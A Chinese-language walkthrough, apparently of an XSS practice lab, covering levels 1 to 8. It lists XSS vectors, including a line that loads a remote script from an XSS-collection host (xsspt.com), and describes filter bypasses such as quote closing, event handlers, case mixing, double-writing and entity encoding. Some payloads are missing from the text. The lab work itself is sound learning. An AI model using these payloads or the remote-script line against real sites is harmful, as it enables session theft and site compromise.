目录
基本信息
<script>alert(1);</script> //直接嵌入script
<script src=https://xsspt.com/MQzN0Z></script> //从远程嵌入script
<input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入script字符串
<a HREF=javascript:alert(1)>aaa</a> //超链接
<a HREF=javascript:alert(1)>aaa</a> //html实体转义
1,无过滤
把test改为
直接过关。
2,双引号包裹:闭合双引号>
用第一关的方法,不行了。右击鼠标看源码
发现1这个位置的<>被转码了
但是2这个位置没有,所以可以考虑把2当做输出点
先用">闭合value标签,再输出弹窗。
3,实体转换>,单引号包裹:使用事件,闭合单引号
输入’ ‘’ < >,查看源码,发现两个地方,"<>都被转码了
4,双引号包裹:闭合双引号
简单尝试"οnclick="alert(1)发现直接弹窗,应该与第三关相似,查看后台源代码
发现是有点区别,但是过滤闭合方法差不多
5,on和ri用_分开,双引号包裹:利用a便签href属性,闭合">
还是尝试"οnclick=“alert(1)发现on被分开了
再尝试发现ri被分开了
但是<>是可以用的,所以这里利用a标签的href属性”>,仍然需要闭合<",点击">跳转
6,re,ri,on用_分开;大小写绕过
用前面几关的方法来试,都不行
百度了是大小写绕过
">
7,对整个字母过滤;双写绕过
随便输入试一下,看到script直接就没了,立马就想到了双写绕过
成功
">alert(1)
8,大小写和双写都过滤;unicode编码
百度的
添加友情链接后,点击友情链接,就会跳到刚刚添加的友情链接的位置
拿试水,script被过滤了。
试试其他的方法。on事件也被过滤了,大小写也不行。看了看攻略,要用到转义字符
查ASCII表得:s是115
所以用javascript:alert(1)试试
成功